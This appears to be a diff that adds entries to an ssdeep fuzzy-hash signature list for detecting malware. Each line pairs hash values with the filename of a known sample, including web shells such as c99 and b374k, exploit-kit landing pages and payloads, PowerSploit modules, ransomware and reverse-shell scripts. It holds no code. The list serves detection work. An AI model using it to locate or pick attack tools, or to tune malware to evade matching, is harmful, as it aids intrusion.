+384:3w9yFJf5un0+lDylOZH4jCEYYyYscVAow66nA+OUNTJkGNw1gP8qtN:A9yFfl+BuOZH4sYPscVAowHnA54nUEN,"irwan.php"
+384:3qo/lFtBQGh5fyGEbxe45Pfgoznx9hTsmG+Z:3qwZBQGhTEbo45PfgoznvVsE,"simattacker.txt"
+384:3pVMSX4Ug+6RwSR+e9SySVdmumU3a1vudCuwTmK4ZM9mC4A454N4R0vcS3/ioIsi:3pVMSX4UfywSR+e9SySVdmvU3a1voCuv,"2016-08-11-page-from-thesandpeddler.com-with-injected-script.txt"
+384:3hgeNYEfaB92lqBxSF3c7Akj7jwjbggLkZU03l2l5Gi20NX641O9ZWc:3hgeNYEdquF+7kAgLkZUI2qZ40ZWc,"2016-06-10-Rig-EK-flash-exploit-vs-18.0.0.160.swf"
+384:3ddBdfCJg/xpJoooig3UpQ8WaqLenKLPzJe/grvdwxTNRpZ441TljHfCYFjQg:3dLdKJSx/ooJ08WpeqdM6vOTR5vugjn,"filesman4.php"
+384:2ysWuhnxqgQm/x8xRXvtzcgq29Z/jd2gQwnBSNdjIg+tovtzX:2ysWuhnxqxmJKBvtzcL2T/jd2vwn0NdR,"lolipop.php"
+384:2ysWuhnxqgQm/x8xRXvtzcgq29Z/jd2gQwnBSNdjIg+tovtz4IS3:2ysWuhnxqxmJKBvtzcL2T/jd2vwn0Nd4,"Lollipop_by_KingDefacer.php.txt"
+384:2y9UvSw+vtCyVx+yFYXjaSb0gJuvPA7R1EqzevQFKPzBw8y5GlkWOr0I7:2y9Uvj+vMyVAh7HEhIKFw8YyLO,"Invoke--Shellcode.ps1"
+384:2nGmcG53d62u4nKL+XXRfXX2/gHzv/0L0f6:aBN636w+xfWQ/0L0y,"Zaco-Small-Web-Shell.php"
+384:2N0zzeR+yr/HC5jsz08kK6HCHy8HDid6gCOVHxEjZwLQyaAR7F6HHeN7nrhIqbkZ:nyTH0K6HCHy8HGCUHtFQHsbkHE84HA,"VirusShare_66783019d250fe1174a0686758f61749"
+384:+2Lcn0PP958VI5bOR8+ulgdtn3ltyxesW23Fq:RL+aNOa+u+djBB,"2016-03-04-ksvi.co.kr-CpZbGj.html.txt"
+384:2d9yACpjXk28ERdQ2apfTz6VIlXDQ0AZWCi3yJv7ugovqnndToOzmBBtbckwB/oW:4y3vxadTz6E0cCJv5ovKdbmPtbch/v,"s.php.txt"
+384:24KMv88Ovh1NZtU1QvC+XoF3Jv2rX7DapkJw+1Bd:24KZlZLgQa+UJraZ1Bd,"2017-02-23-Rig-EK-flash-exploit.swf"
+384:1zIHyrTxq3dD5vvX7pNHt6vEquXdm3QaQtmYBZmLD2k5VECdbdY:1zIHyrTxq3dD5vvX7t6bTxY,"Confirmed.php.001"
+384:1zIHy5sxq3Lzx5vvX7pNHt6vEquXdm3QaQtmYBZmLD2k5VECdbi:1zIHy5sxq3/x5vvX7t6bTm,"Processing.php"
+384:1v1GxZ3b4QL4wkSk8dE4x9hTsmGeK4GNB6kUn+nuZ:1vo33b4QLKSk8dESVs8Gr6kxc,"ajaxshell.txt"
+384:1v1GxZ3b4QL4wkSk8dE4QGNB6kUn+nuaISf:1vo33b4QLKSk8dE3Gr6kxb,"Ajax_PHP_Command_Shell.txt"
+384:1MdMhSUy2ZfT0/eU/pG4FY8rn/RZukZzzaIgMeMiif1:TPy2p02Uakvg2JN,"2016-07-26-page-from-calentejo.com-with-injected-script-first-run.txt"
+384:1JZWoAJeNzr9x5wuYPrxfHhfBODwnzq0UPt9CQaEmCrgExdJSxUREyWJLw9t8tVa:1JHhnYPXO0UlqAax/JLwoHc,"MySQL Web Interface Version 0.8.php"
+384:1FupuvATXMFqQyQkWjmuQzahS6oC333MRx:1ya0zas6oo3MRx,"Loaderz WEB Shell.php"
+384:1BtKwRWqTFAkiOhGWBQs1DZh4vrVCnQl9i2odZn5yND/Okp7rooV31oNO/hbIror:BKRf1s1DZhIpYHRd785p733ONchz,"2016-06-28-Rig-EK-flash-exploit-after-monavocatparis.fr.swf"
+384:0x6Nx4A8ZPJ8s5o80bOIs+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunf:0x60A2PqsW8s7sMB/XTSfizpv+uunf,"pas-3.1.0.php"
+384:0w9yFJf5un0+lDylOZH4jCEYYyYscVAow66nA+OUNTJkGNw1gP8qtf:r9yFfl+BuOZH4sYPscVAowHnA54nUEf,"preg3.php"
+384:/0n6DFtF4ADDp6TC8d0/RcnZ8ge33latCA:86FtF1/p6XSpcg31a3,"2016-04-18-EITest-flash-file-from-caddea.tk.swf"
+384:0mzZeAN4xrYcfkL3ywriK3Up15HrQVI0Y+2Q9cbCxKCWykqPIWHl8Yvm1Y:0mzZnOeImCwWWUNqYCcbCxKCTkqwWF9,"author.php"
+384:0Kzp4Jwn+JutJkIrBusKbm/czo4u4O+26xN4l8u64FutaHgutcBXgt1l8/RrXK:xTXrB7K8czoZxZdl7uKLBYRrXK,"CIH.[ms]-WebShell-cihshell_v0.99.1-beta_fix.php"
+384:0+i2LZYC3W/MXoktKaEWCQD80F5t3pCiVo4iMHEhpP4HRC6yeClHudgqrhhu7r93:0+Z+uSGFKaE1I8s5BpdVTkhSADjULFhU,"20160131-122425-Vq1wWWjuZ1YAAEE7c0EAAAAG-file-CbtBIA.1454207065_1"
+384:0AkVQEhpdHkRpfbLlTJkRYkUkRvN3KXLAJ+EXH4do+W3veE18EgbBgusGEsWw1YJ:0sdGx13KX7EB+VBfsGE79kCaAx12px2d,"index.shtml"
+384:051EWv4YDI+xRVug3dNiXcUL/0+pzS7Yb/5ty/S2hn/Zez84g+Rl:PXHpvJq4X,"wget-symlink_attack_exploit.py"
+384:026nYITPOc2kRcM5QOxU2qyQdbjr2aVD77r/j8079lSHnzv/x3K7V:+YItMMdx8jU5j+V,"PHPSPY_by_Angel.v1.5.php.txt"
+3:7ROWFBYFnN1KLooDnHMLn:7ROW7YFNAFsLn,"devshell.md"
+3:7n7xUxVN3GLEVuNMjk8l4hcKfFTwyn:7n7STNGABjk8l4hc4+yn,"reverse-ruby.rb"
+3:7n7gBY3XMMrFwjAXzrcW4hcKfFTwSLuLuU:7n7gOXMMrFxcW4hc4+SLuLuU,"bind-ruby.rb"
+3:7LZ4de2bz:B4dfv,"includer.php"
+3:7DcJkW9IA5eRtBGAyYJ+fvz:XS7z5e/1yk+fL,"editor.aspx"
+3:6vzIuCwN7HW2017zA8Iwv:699W2MnrIa,"simple.jsp"
+3:6v6BJxQU8RnhcvATE5qhv8czhF1Ln:6yu5RnGv2l5lhFJ,"a.asp"
+3:6s6a0/1IxeBjj9vn:5saxeB1vn,"JFIF.php"
+3:66pi5E8hkgvZuQnn4XOAIqAeO2AjmEE:xe+gBuQ4eAIqAeOryEE,"CodeExecution.psm1"
+3:66pi5E8hkgvZjAjmEE:xe+gBkyEE,"Recon.psm1"
+3:66pDGkcBLSAXbMtBGjmEcimNAGyMn:xD7cB78sjmEcwvMn,"PowerSploit.psm1"
+3:5MmTWJqD1V9NQjW:hTnV8jW,"__init__.py"
+3:5lFaeHiaK5GmGTCFhcPL/J:cGiaIGmH+DJ,"exec.txt"
+3:4CNXCgv9G87MH/Ze5VX+QFNFTBiFQ29G87MwcmITBMeHNHe5KVDvFNFltvCLn:4Cxvk1HR2+QFNTkk1H1HZzVFNJCLn,"simple2.php"
+3:4B7cwBQqD28BGMZtKBQNBKHrWduNTKHr/iJBLBpSeA:41mo2tBQNBKHrWkTKHr/mBNpSt,"system12.php"
+3:3OAeoo7oVFJwjGVKzKACzDcXnqOaL:eZDoVToGVK3Cvc96,"rce2.php"
+3:2QoHkK7oKXKwdqV0GY26TpCAQGBC6gqA51MUjyKeOTp6B3:7LK6wYvY2HlOfUmKe3x,"Asp最新变形一句话.asp"
+3:2NK29mvQ:2NK5vQ,"test.txt"
+3:1Lm1YBlN/Wn:1LPlw,"__init__.py"
+3:1LjiRMxlDDx0Q1JIilDDxhmXv3M2uVMXXRlVevn:1LjiRMxlBp1JxlBhYv31ly,"__init__.py"
+3:1Lh6EIMxQ8R1pWMXXRlN/Wn:1LhvIGQA1pFlw,"__init__.py"
+3:0YTh1cEzR7cNzdJoJeO0De6OIgJGe7Vwvmg28zvJLJEJv8BaRkJDAWcNeO:0YjcE9AzdJoJR9oywPJCviaRADU,"weird-12.php"
+3:0iXYj0+e4H:0iAH,"payload.php"
+3:0iXY4BjxwWXR4tYe+NJWBdw:0i2WXmC/Nww,"accept_language.txt"
+3:0/FF5FH22/M7kjg4IWSae1QLGIb+hVNZEGBfvQ:qBRnWahyIbetQ,"PHP反射后门.php.txt"
+3072:zx/B8OBUsBUbUgIgHPDyQtDcgAygnSPby:zxjBDBCUUHPDyQtDu/SPby,"body.115.002"
+3072:ZVxk7og8PLEdS3z/7QBhWnMSfuEAwM523uqEdQ5mXtHRZew7IDu:ZVi3PSrkbWM8VAwrEXtxZew7IDu,"2016-01-25-EITest-Angler-EK-landing-page.txt"
+3072:ZVxk7og8PLEdS3z/7QBhWnMSfuEAwM523uqEdQ5mXtHR2w7IDu:ZVi3PSrkbWM8VAwrEXtx2w7IDu,"2016-01-26-EITest-Angler-EK-landing-page.txt"
+3072:ZVxk7og8PLEdS3z/7QBhWnMSfuEAwM523uqEdQ5mXt4WG9w7IDu:ZVi3PSrkbWM8VAwrEXtfGw7IDu,"2016-01-28-Angler-EK-landing-page.txt"
+3072:ZV7cj5Lj59qP73C1tEzL60H04c5e3/Iqp1PN:ZV7cj5LjqRH04c5e3//V,"12309.php.txt"
+3072:ZV7cj5Lj59qP73C1tEzL60H04c5e3/Iqp1P9:ZV7cj5LjqRH04c5e3//F,"12309.txt"
+3072:zUqna9TSzDg8G0ZGqDXxdpz6ECmHinzfiN3hPYi+PWau5:zUqna9TSzc8G0ZGqjxdl6ECmHizfiN33,"603523a17e07e26a271be1718cd95306_php.txt"
+3072:ZtLQNn89V5b0avfk2vdKof8eRqYgHhKfEw7b/msmedTedO:ZFQNn89V5b06ktfkE0/msmedTedO,"2016-01-19-Angler-EK-landing-page.txt"
+3072:ZtLQNn89V5b0avfk2vdKof8eRqYgHhKfEStI/msmedTedO:ZFQNn89V5b06ktfkEAI/msmedTedO,"2016-01-17-Angler-EK-landing-page.txt"
+3072:Zst6ljEQd5dhNm3c1uyFmHMrsgcVGIpHqcxvRe5qVCZPHD:qt6lYshNSc1uyFmHMrsgcVGWqcxvRe5D,"bad.txt.2"
+3072:ZsnLv8lQ6z/uONbsZqr0UKCbiNl3eupcoGlY9Uh78KOEwwojwwwwwwwwwwwwwwwv:ZRzbbr0U8NJeacRlYeV87L,"2016-05-17-dropped-file-from-the-tofsee-payload.exe"
+3072:ZNtL6FcFIC/5iMyqW23SSYQmUGFIh7KR2Emlijkb:BKcFIWTmUGF2KTmn,"Backdoor.ASP.Rootkit.b-UtMost文件管理系统--2.0火狐安全网修改版.asp"
+3072:ZncpZccuWxlWqD9MkzOnJeaoZvJYFShTAavWLPxTR/Ln8iwRcOu1Hr:oBmqhTOnJeaoLMWb8Px5L8XyF,"Backdoor.ASP.Ace.df-Moexa.asp"
+3072:ZkfmH9TcVFXrzxcXH9sjuTKJewcfsfbiwZAMj4Hb8O1uHQCkHgv1/sim/e:Zk+H9TQkHaoqtksfb8M87zUQCkAv1Uib,"2016-04-07-EITest-Angler-EK-first-run-landing-page.txt"
+3072:ZkfmH9TcVFXrzxcXH9sjuTKJewcfsfbiwZAMj4Hb8O1uHQCkH9zv1/sim/e:Zk+H9TQkHaoqtksfb8M87zUQCkdzv1U2,"2016-04-07-EITest-Angler-EK-second-run-landing-page.txt"
+3072:ZjfXw93z2IeELYB9UDhE+Vo+1QeieYaVXNVfz6v:ZjfA9jL/0oDaP+1zjlNVfzU,"2016-05-25-Rig-EK-payload-second-run.exe"
+3072:ZGBiy6/eZbLH6VcD3tFL6QxCNCj6SFcV6Q9S9E:Z3z8bLHNFL6QxSCj6S78,"VirusShare_884522a2b98d7d61a9abd7bab1a96701"
+3072:ZGBiy6/eTBI2A9nBiXkSBW1Dyvk5D6b3ivw:Z3zy62A9nUXkSBW1N63ivw,"VirusShare_2f384e7bb8f8ea7b6ce1878d8a4d2431"
+3072:ZGBiy6/eo3cs517qVkdC9nKN52IGMf+ImVY8:Z3zv3csWON52IGMf+J,"VirusShare_97110a1be0a6648612653666f776cbea"
+3072:Zei/6iaEqfwkdCFDt4U3KXWC8LhNpsy9p:ZeHifpkdCFDqUfFs6,"2016-03-24-Nuclear-EK-payload-after-macfly-studio.com.exe"
+3072:zcTAiqNNL5ZciGbkYK0z0GD34hICbeb72ruhz3G5:zcTAJNl5ZciGbkYK0z0GD34hICbebFhi,"header.php"
+3072:zcqciJNNL5ZriGbkYKMz0GDN1hICbeb72ruhh3GF:zcqckNl5ZriGbkYKMz0GDN1hICbebFhg,"c99.txt"
+3072:z4SYD6MITsLytAcRhd86vViIErEQQekfjQaCTmih0lYlwKY:kn9yum9uZMjkh5l,"2016-08-24-pseudoDarkleech-Neutrino-EK-payload-CrypMIC.dll~"
+3072:YxNNi/jf+vqnXfDjs7gUucuvtJvgnSP0y:Yx3i/jf+vqnXfDqucuvtJISP0y,"body.113.172"
+3072:yxhXNb2Ah90us+YNkII65IAMltTdgnSPCy:yxFNZhts+YNkDAuBySPCy,"body.113.252"
+3072:ypMEOkyx4BBrU3QBh9y+IHmrAYc+dZQ0uVXl625DCOrpUGnbqAH3E66BQaZFHYIY:ypMEbyx4BBA3QL9y+IHmrAYc+dZQ0isW,"r00ts php大马.php"
+3072:yMYynCNVuG7BituutQxCGsBeHjzXoCsN5o3rIsCHxZ:yMYnN8G7BituutQxCGsB0jzXoCsNrsCT,"c99-2.txt"
+3072:YmNlUXxJ1VSCGEN8i5ybxGjR8OGFhh71JPMVlWcYDOpas5FN0:YmkXx/VCEN8cybxGtlmDAVwqphf0,"2016-04-07-EITest-Angler-EK-first-and-second-runs-silverlight-exploit.xap"
+3072:yivZj+sA57w2WhJsz6OMjxcfMy3joZrFBkScnjsImZv7oWm:zh+sANwxOixcf53joZpBJIsImZv7Dm,"sadkjfhalskjdhf2.php"
+3072:yEBenhn4h+p8C0Y5wOjCTw6+gy4q0Sn6nrAGosZAk6j7yI3H:yEBeWxtQwsc9y4nSwCnk6qI3,"2016-05-31-CryptXXX.dll"
+3072:++Y9eXWfk1HUxH7DLesRDTZ8+pcFgBha9ONk/Cfo65eDY/TzX8ZsHQvARxiT8ZjQ:++Y9eXWfk1HUxH7DLZRDL6m9cDTiY8yZ,"c5f50debdbc5b4b6a1ec04e9f6705062_php.txt.orig"
+3072:y4NPsItaNb80UyOW8wDAF3s2hD4xOdGHND6x9xtRVS4zwjG+ARA:y4NPsItaNOW8wDAF3s2hD4xOdGtD6x9w,"b374k-2.5.source.php"
+3072:y1a+1XTeN6jqLQituutTxm6KBERIzWotzhhv39BH5k:y1a+heNIqLQituutTxm6KBgIzWotzhhK,"c99.txt.001.001.001"
+3072:xxuLwzdVwh8r/mMRw7s/1UWU0np8gnyPty:xxCsdVwh8LpOe1UWU0XyPty,"body.113.316"
+3072:Xx5qXqPnlq/74OJnIRy4mjSCE3zveciHYo311kkcAwoM3hBLtS5dmIkzu0DcZ9r+:XxcXqtdOJIRy4mgFo3ZshB4dkzu0yY,"2016-07-14-Afraidgate-Neutrino-EK-payload-Locky-example-3-of-4.exe"
+3072:Xx4vyVVHub54z3eayaKVhn0nz756Fm9vw:XuvAFy4Zm10z7sw,"2016-06-15-Sundown-EK-payload.exe"
+3072:/xWvit+pGecb9YZ349wR3D4dEgVT1jtuq6hUqTcEPSAD+eyk9YJbnx8:/LttecbO41576hUYPbD2QYJ6,"12.php"
+3072:XqJxhHMdSiaXJwlDrRCafrErUKYGE6QwsicgJHoOXjjfY/BxqVOW:6JxhHMdSiaX+lDrRBwrUAEpfgJHoOXjZ,"2016-02-26-Angler-EK-landing-page-after-hscteam.com.txt"
+3072:XMQynCNVuG7XituutQxCGsBeHjzXoCsN5o3rIsCH52:XMQnN8G7XituutQxCGsB0jzXoCsNrsCU,"c99shell-v1.0beta.php"
+3072:XjNkRQhgm4PlUtQ01kcZDD1d8WMSnrnqWUKX:GW34PlYQokof1d8WMSnGTe,"nabilah.php"
+3072:xJmqAoa9hapRJcZcXAsW7bhkRXTaSfCcHNQ8bH4ReB+I7P5Cn:inTapncuvW7byRXo78bH4Re8I7P5A,"2016-05-25-EITest-Angler-EK-payload.exe"
+3072:XJHvNr9VBdtXeqJlM0pQGShh8wTtX+Xmgf8cFdh0ZxunyiHNjA:XBvj/LeqJO0pOho2JcDSyi,"81cdf0e7933c1a6253c942c5942f98f1_php.txt.orig"
+3072:XHTt1r+ueoG1HawU50ArP0jRz7Hee52KpU06g7Ff0IC73ur44r:XHzKuHG16OArP0Vz7Hee52KW06g7Ff0S,"error85.php.txt"
+3072:XHpo4e4sPbosotVPLL5kvYamIzveHYQuNCnn88gTqt8AyP:m42voPPLtw5vBQnFgT67yP,"2016-05-31-pseudoDarkleech-Angler-EK-landing-page-second-run.txt"
+3072:XHpo4e4sPbosotVPLL5kvYamIzveHYQuNCnn85gTqt8AyP:m42voPPLtw5vBQnogT67yP,"2016-05-31-pseudoDarkleech-Angler-EK-landing-page-first-run.txt"
+3072:XhM7nSJupdsmDW0YQdkzi0a+rJfRlE1bA3ND:XUSJupYfQdkzi0a+dZqUl,"ColdFusion.chm"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8SPWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b8BxUO,"2016-03-03-admedia-Angler-EK-landing-page-after-myagesconsulting.com.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8OPWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b8lxUO,"2016-03-03-admedia-Angler-EK-landing-page-after-capital-consultancy.com.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8O6zPWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b8OPxUO,"2016-03-03-EITest-Angler-EK-landing-page-after-ospedalesantamaria.it.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8nPWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b8+xUO,"2016-03-03-pseudo-Darkleech-Angler-EK-landing-page-after-rsimcbintaro.com.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8kPWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b83xUO,"2016-03-03-admedia-Angler-EK-landing-page-after-cosmoflor.com.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8ePWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b8VxUO,"2016-03-03-pseudo-Darkleech-Angler-EK-landing-page-after-myagesconsulting.com.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b81xPWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b818xUO,"2016-03-03-EITest-Angler-EK-landing-page-after-chiplawcoaching.com.txt"
+3072:XFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b80PWxUwh:VNWbctHHmzTd9ooi6PbI3RTJ4b8nxUO,"2016-03-03-admedia-ANgler-EK-landing-page-after-augenlaserinfo.com.txt"
+3072:XEuLQrhShFDaeto0cyaRUKGGgleJVN9qyOS7ooOGRUTgDIcCZD9h9h9bjbZFr6a5:Aeto7zOXTYDbN7Apj5mu,"zjjv.com-aspshell-11065-obf.asp"
+3072:/xA8scYSYRRKViVwQMIKjJy373l3PgnSPXy:/xVs/5RHwEKjJzSPXy,"body.113.231"
+3072:X6R0FuhaKU32a4Uunu+GaKki9JqZfIYZG:X6RM+Te4UunuSKki9gWY,"2016-05-26-pseudoDarkleech-Angler-EK-payload-CryptXXX.dll"
+3072:x03MAevYFpBVRxECPuNDERXvUzzGW5q5XDNXj8oK6X6uQ+KkaLo94FpGZNB:x03MADPBVf7PuDERXvKh6XDNXj8oK6X5,"footer.php"
+3072:wYE4DgTbB4WQKLOi8sStfHVroSvIxptGsuxohTTv:wR/XSWvfUf1r4ptRKGTv,"Dokan_Dec2008.zip"
+3072:wxyhwKrkRa+vGqhvV6W68ZrtUsj8J7nzvd6:wku8kbu691BtUK8dnzvd6,"NIX REMOTE WEB-SHELL2.jpg"
+3072:Wxw2LTSK5oaCU8k92Ig7ae/CjGF9bHdLY81FgnyP+y:WxBeK5oaCU8k92Ig7ysTOXyP+y,"body.113.320"
+3072:wxOlKVALLd353uCxi0o3XIJQ0/yGAzDACR:DU+b3uZ73XPrGaR,"litteryi.txt"
+3072:wx6mRj6T6qRtoOt/cgRO/LORkPW3oCJIgnSPgy:wxIRVkPW4CJBSPgy,"body.114.006"
+3072:wONZEPQn/KFutBfFDh48cjuXQR1QCSKYwaqrYzESCq5OSpU7u:vjDykFDp1AR1Q1kaqYXIj7,"2016-06-20-Sundown-EK-payload.exe"
+3072:wob+uWuEdEBFYyrxt/9hXtniAAQdayNoAE673oBq3:MuWuEdEBWyr3FqAjdtW36jo,"2016-05-27-Rig-EK-payload-Tofsee.exe"
+3072:WLt6sIe22+2+dhNm3c1uyFmHMrsgcV3xpHq7xvYe5SHGB7Hk:Wt6sp0hNSc1uyFmHMrsgcV3zq7xvYe5q,"SsEs.php.php.txt"
+3072:wLR9+tnObTwZtTA58HYtf1SOunaW3U3EDe70uVXlH/viLHt/OEjjsdjgC7AxJR48:wLR9+VObTytTA58HYtf1SOunaW3U3EDT,"help.php"
+3072:WiisdtLQXdh/zaaSLaK1+WJ8o8NLBXzUXEo:FisdtLQXdlzuLa2+WJ8PNLBXzUUo,"2016-02-22-Angler-EK-landing-page-after-todoimpresion.com.txt"
+3072:WiisdtLQXdh/zaaSLaK1+WJ8o8NlBXzUXEo:FisdtLQXdlzuLa2+WJ8PNlBXzUUo,"2016-02-22-Angler-EK-landing-page-after-snydersofhanover.com.txt"
+3072:wdmPxRuA6JQvhDxBZF/u7d0AN9IpIOYLTjOhxAwJn8DYnnl6pIKO:wAPxZ9hTCmplOeH8DYl6pIKO,"2016-03-09-pseudo-Darkleech-Angler-EK-landing-page-after-deathanddesire.com.txt"
+3072:wdmPxRuA6JQvhDxBZF/u7d0AN9IpIOYLTjOhxAwJn8DYnml6pIKO:wAPxZ9hTCmplOeH8DYC6pIKO,"2016-03-09-EITest-Angler-EK-landing-page-after-www.rcp-vision.com.txt"
+3072:wdmPxRuA6JQvhDxBZF/u7d0AN9IpIOYLTjOhxAwJn8DYn8l6pIKO:wAPxZ9hTCmplOeH8DYo6pIKO,"2016-03-09-pseudo-Darkleech-Angler-EK-landing-page-after-imasummit.com.txt"
+3072:wCrihPpPK2LjWh1lqEQHdar9MysbwX9gShWYNq4p3:vr8pPK2Ljy1lqEGar9MysbwtgSnNqI,"Fx29Sh-3.3.05.09.php"
+3072:WcOh/ij4dmVo+bZLDGBRSUZwjiaqE/uh0YOeAg:W1Kj4EVo+ZMSUZwjiaqE2CYDN,"2016-07-18-other-Neutrino-EK-payload-Bandarchor-ransomware.exe"
+3072:wc8UiJNNL5ZUiGbkYKMz0GDN1hICbeb72rJhC35u:wc8UANl5ZUiGbkYKMz0GDN1hICbebehB,"VirusShare_1422c6107203a77a8723a8e4f58addd1"
+3072:Wa73n8+N+5Ms81opp8AvDlAuerlCnwRk+bv83AAtJxp76lJzZNd/2UQktJALc:Wa7v4h81aCkiueRQFtJWzZT/5QktSLc,"2016-03-11-Angler-EK-landing-page-after-fixwindowsproblems.com.txt"
+3072:W+70ZJkOKUyKRGs2RDEyKtxCeDGQ1tt2J+8V1t:l0ZJkOKUyKRGBDEyKtx6V1t,"sniper.txt?.001"
+3072:VXNPsotaNyB5CUkMW8BwDAF3B1JeLy53P/t4xOztGwNm6x9xtRRi4zwrfLl:VXNPsotaN4W8BwDAF3Bsy53P/t4xOztw,"b374k-2.6.source.php"
+3072:vxaLVx8V8cHGeKpoFLfPHn+V+VYgnyPLy:vx2r85HGeKpoF7P+cXyPLy,"body.113.356"
+3072:Vx1LT+lCXcl+aRfDC4I4ZWe1t3MmQAegnyPty:Vx1ilCXclc4Iarx5JyPty,"body.113.335"
+3072:Vx0h1VYlyz403NTLdziawqXSbDT7xAIJzDWR:86g409hDlXSbDT7xRw,"DBotv3.1_March2007.zip"
+3072:VWxDRsyLm3i1/XYRbVkBeIoa7WEP/dKBMZQ6:kxdss84We/1KBMZ,"2016-06-30-realstatistics-gate-Neutrino-EK-payload-Gootkit-after-lostreschiles.com.exe"
+3072:vVynukMhSoe7d40z/7x+RNDOQnGOjrSOPw:vVynukM8oeJ4M/7x+R5OoGOjrFPw,"mca.php"
+3072:vTg+0elYqz48SxrxEGwLX72RREQRMIapLi6kSTmYoJyXQ:vTg+0elYqzrSZxEGwLX4RE4MIapi6bA,"EgY_SpIdEr ShElL V2.php"
+3072:vQcX1uDob63ge5/v0kTldfRIueNQWzvP0sKy+zjxX2mDJiDt8Q+KN1CFCm6:vpcvwg8Uld53eS1LycxXnsDt8QXN1+C7,"2016-03-01-admedia-Angler-EK-landing-page-after-nowpdp.org.txt"
+3072:VMSynCNVuG7fituutQxCGsBeHjzXoCsN5o3r4sQHpw:VMSnN8G7fituutQxCGsB0jzXoCsNxsQi,"c99.v1.0.php.txt"
+3072:vJlBUSzdpy3gDmVrgIojFvr8pNQVXiuOyOwTPpFdj47g+/uMiBEDeenhEmPCTnLB:h,"2016-03-24-Locky-_HELP_instructions.bmp"
+3072:Vi6KHo+CNfWFKNWxolFUpYFbrwzGXp1psqH0v+Xyiigx+vHk:Vi6KHE8AN4olFUpYFbrwzGXpMqH0v+X5,"AntiSecShell_by_5n1pp3d.v0.5.php.txt"
+3072:vED9d/PKo+cBlzpPDeU6BOFqd19CNoTwxzUOXxs:sD9dqo+45pz4UNOwdUR,"Mysql udf by M4ster.php"
+3072:VB966sH7YUFe53WTheb2ORNiXimvATfkHp6DNnuz:VrMZwzmaYan,"2016-05-25-EITest-Neutrino-EK-malware-payload.exe"
+3072:V6fAP6fY0Y6axnWlZPmNc4O71oZwREVXOJhU9/+OSs6Cn61DSDu:EfAPQ46anMZ+dORoZcEkJa7SbweSu,"ALFA.SHELL.V2.0.1.php"
+3072:V6bJEo9faWbI82VyFmHMrsgcVnkpaqLboY/BUq1sVHz5lNp:wbJB9bsyFmHMrsgcVnhqLboY/BUq1sVn,"p0isoN_sh3ll_Priv8_by_TeaMp0isoN.v0.1.php.txt"
+3072:V60Gp4nbs6oZPnENFnK/wy06rpXj/cKWmzsYvBRXEfqnyEHUU/NxD2ISbkT4j7fe:khEu6rSRFXgyzsYjEiHrNxS1QT4/m,"2016-08-16-pseudoDarkleech-CrypMIC-decrypt-instructions.JPG"
+3072:/UZ5Xd38KpUxEbXSXXEd2/jDZOO0OWaMqrmDpIzOb3m:OpHbXSXXEd2/pmtDC,"body.235"
+3072:UxpLoXwsxOJAAeLLmN3UNl0IfUkUTgnyPQy:UxBuwsxOJAAeLLmBeBdyPQy,"body.114.012"
+3072:UsnLv8lQ6z/uONbsZqr0UKCbiNl3eupcoGlY9Uh78KOEwwoj:URzbbr0U8NJeacRlYeV87L,"2016-05-17-Rig-EK-payload-tofsee.exe"
+3072:usCfGz7XOfhrOyErvM1p9KhrsFuHnGfGco:usoGzOuzM1D30nG+,"NetworkFileManagerPHP.txt.001"
+3072:unO6/SPSmEXWE24eGOok8ybYnyarny1DgRD749afkxM51wb77Fu:eqPR349OxYFy1X9aCMY77F,"2016-08-24-EITest-Rig-EK-payload.exe"
+3072:uf2kKojIGJqConipkfAuJtNB4G5zXlV7YzDzIOJETfHr4hrCNAseT6fT5ilBqh5e:ufVKojIGJqConipkfAINB4G5zVxg0OJd,"dirs.php"
+3072:UA/pDOvVbFuAUwSibIueVGevqCn7iYW9bkT9yyCiJ:LDODUwSHvM5BkxlCiJ,"2015-08-27-Angler-EK-landing-page.txt"
+3072:u7WGtQRS0yhVnA/XqdKPy6v4QjBcXoXJDBstV+OperqjoZw4iOizhq3BGCYRf4:u7WFpWnwXqdKPy6v4Qj6XoXJDBCV+Opy,"2016-04-18-EITest-Angler-EK-landing-page.txt"
+3072:u7WGtQRS0yhVnA/XqdKPy6v4QjBcXoXJDBstV+OperqjoZw4iOizhq3BGCBRf4:u7WFpWnwXqdKPy6v4Qj6XoXJDBCV+Opd,"2016-04-18-pseudo-Darkleech-Angler-EK-landing-page.txt"
+3072:u1MBsbF3vlW+L7F0BHFLHIvoCEDSYyEcZ:uysJr7+ovo/SYL2,"PHP Shell2.jpg"
+3072:tzuQWXrNaAoHOlfRvsKj3S+kG1+Xi1cMzTpnjn4X7E:t0pgulaKjIecY9kXA,"bnc.tgz"
+3072:TyykbZc5K59Yaa/l+0wUIMfF3ei0MyIwtGsb0f+wN/d3Q/2RKSQzuo9c:TyNbe5/n/1wRM1eiPLwtGch+dE2RQzuL,"2016-03-08-pseudo-Darkleech-Angler-EK-landing-page-after-kidspathwayspeel.com.txt"
+3072:txT3Nk6q6ag76q6xqgmIF4kgOIjdUT3VyAZJngnSPJ:txLNkBzg7B8qgmIF4kGjdUT3Vy4JgSPJ,"body.113.071"
+3072:TxpLyFrDzL+Og/OBlXkeMnJP1ezgnyPXy:TxB4r7+Og/Ob10ZyPXy,"body.113.354"
+3072:txGdeV1uWaJb9LdNr3ma5Ym5daEfgnSPly:txGMuWaJb7Nr3JYQYSPly,"body.113.241"
